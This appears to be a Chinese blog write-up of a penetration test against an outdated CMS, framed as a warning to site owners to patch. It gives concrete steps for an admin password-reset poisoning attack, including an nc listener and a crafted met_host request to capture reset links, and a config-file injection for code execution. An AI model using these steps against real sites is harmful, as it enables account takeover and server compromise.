
记对某cms的渗透测试icon
来源:
浏览:134
时间:2023-09-23
某日闲来无事,又朋友说某CMS平台又报出漏洞了。虽然这个漏洞很早之前就存在了,但是仍有很多的网站没有更新!通过本次的测试,望能够引起站长们的注意。及时更新补丁!!
管理员密码重置漏洞
首先,我们访问目标后台https:///xxxx.com/admin/admin/login/login.php一顿 666666走起,万一成功进入后台呢?
点击忘记密码
这里需要管理员的邮箱,那么问题来了。怎样获取到管理员的密码呢?有两个个思路提供参考:思路一: 查看网站的联系方式,里面有相应的邮箱。(但有可能是非管理员账号)思路二:通过站长工具域名反查,获取管理员邮箱。(建议用这个,一般管理员在搭建站点时,用的时自己的邮箱账号。)
怎样判断邮件的正确性
如:我们随便输入一个邮箱,会提示没有找到邮箱,证明邮箱错误。
若提示发送成功,或者失败则证明邮箱正确。
抓包
在确定好邮箱之后,便可以用burp抓包。
在kali虚拟机上监听80端口
nc -lvvp 80
在burp repeater中构造http请求发送
POST/admin/admin/getpassword.php?met_host=192.168.123.6因为目标时外网,而kali是内网。所以需要端口转发!发送构造的请求,在终端中成功获得修改密码的链接。
打开链接效果
修改密码后成功登录后台
Getshell
对其installindex.php代码审计发现
$config=""; $fp=fopen("../config/config_db.php",'w+'); fputs($fp,$config); fclose($fp); $db = mysql_connect($db_host,$db_username,$db_pass) or die('连接数据库失败: ' . mysql_error()); if(!@mysql_select_db($db_name)){
在填写数据库的步骤的时候写入*/phpinfo()/*
访问http://xxxx.com/config/config_db.php
总结
本次测试的环境,相对来说漏洞比较旧。不过在学习中体验乐趣也是不错的选择


